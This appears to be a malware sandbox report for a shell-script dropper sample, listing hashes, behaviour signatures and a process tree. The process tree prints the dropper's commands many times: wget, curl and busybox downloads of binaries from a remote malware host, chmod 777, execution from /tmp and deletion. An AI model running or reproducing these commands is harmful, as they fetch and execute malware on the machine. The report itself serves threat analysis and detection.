Analysis
-
max time kernel
82s -
max time network
83s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
-
Size
10KB
-
MD5
04d0449c41da21e91fcff668642e400d
-
SHA1
2a7724ac4a33aef57e864b4ab2ba41126ab9d3c0
-
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
-
SHA512
5c0f07e89ce67dfddfc6e90649fe73b20d8f460fd230aa8a787e68c8bafa8ac1acd949b497d7a0b0b55512ce9910ea9ea43bec6f80131074b11222c8fdab2094
-
SSDEEP
192:I5OQ49pUXvxwks6Pk+Y+k+j+2+e+Z7HTgG+HB6HTgGwNPk9pUXvfwks64+Y+k+j+:I5OQN6N+HB4wNPM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh1⤵PID:739
-
/bin/rm/bin/rm bins.sh2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:748
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:773
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:774
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:866
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:953
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:960
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- System Network Configuration Discovery
PID:967
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:995
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- System Network Configuration Discovery
PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1016
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1019
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:1020
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1021
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- System Network Configuration Discovery
PID:1023
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:1024
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:1025
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1026
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1027
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1028
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- System Network Configuration Discovery
PID:1030
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:1031
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:1032
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1033
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- System Network Configuration Discovery
PID:1034
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1035
-
-
